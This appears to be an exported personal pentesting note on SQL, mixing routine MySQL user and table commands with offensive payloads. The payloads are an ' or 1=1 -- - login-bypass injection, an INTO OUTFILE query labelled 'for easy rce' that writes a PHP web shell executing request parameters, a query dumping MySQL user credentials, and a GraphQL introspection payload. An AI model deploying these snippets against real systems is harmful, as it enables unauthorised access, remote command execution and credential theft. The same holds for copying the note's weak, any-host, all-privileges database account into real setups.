<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../style.css">
    <base target="_parent">
    <title data-trilium-title>SQL/Databases</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>SQL/Databases</h1>

      <div class="ck-content">
        <p>SQL is a standard language for storing, editing and retrieving data in
          databases. A query can look like so:</p>
        <p style="margin-left:25px"><strong>SELECT * FROM users WHERE username = :username AND password := password</strong>

        </p>
        <p>If we have our username as admin and our password as: <strong>' or 1=1 -- -</strong> it
          will insert this into the query and authenticate our session.</p>
        <p style="margin-left:25px"><strong>SELECT * FROM users WHERE username = admin AND password := ' or 1=1 -- -</strong>

        </p>
        <p>The extra SQL we inputted as our password has changed the above query
          to break the initial query and proceed (with the admin user) if 1==1, then
          comment the rest of the query to stop it breaking.</p>
        <p>To create/alter a user or change a users perms, use: </p>
        <p><a href="https://www.digitalocean.com/community/tutorials/how-to-create-a-new-user-and-grant-permissions-in-mysql">https://www.digitalocean.com/community/tutorials/how-to-create-a-new-user-and-grant-permissions-in-mysql</a> </p><pre><code class="language-text-plain">CREATE USER 'sammy'@'localhost' IDENTIFIED BY 'password';
CREATE USER 'openemr_user'@'%' IDENTIFIED BY 'Password12';
ALTER USER 'sammy'@'localhost' IDENTIFIED WITH mysql_native_password BY 'password';
GRANT PRIVILEGE ON database.table TO 'username'@'host';
GRANT ALL PRIVILEGES ON openemr.* TO 'openemr_user'@'%';
DROP USER 'username'@'localhost'; # to delete a user</code></pre>

        <p>To create a table,  use:</p><pre><code class="language-text-plain">CREATE TABLE MyGuests (
id INT(6) UNSIGNED AUTO_INCREMENT PRIMARY KEY,
firstname VARCHAR(30) NOT NULL,
lastname VARCHAR(30) NOT NULL,
email VARCHAR(50),
reg_date TIMESTAMP DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP
) </code></pre>

        <p>for easy rce, use:</p><pre><code class="language-text-plain">select '&lt;?php $cmd=$_GET["cmd"];system($cmd);?&gt;' INTO OUTFILE '/var/www/html/shell.php';</code></pre>

        <p>To see current users and their passwords, use:</p><pre><code class="language-text-plain">SELECT CONCAT('''',user,'''@''',host,'''') dbuser,password FROM mysql.user;</code></pre>

        <p>For graphql enum, use this payload <a href="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/GraphQL%20Injection#enumerate-database-schema-via-introspection">https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/GraphQL%20Injection#enumerate-database-schema-via-introspection</a> </p><pre><code class="language-text-plain">{"query":"{\n victims {\n filename\n id\n key\n name\n timer\n }\n}"}</code></pre>
      </div>
    </div>
  </body>

</html>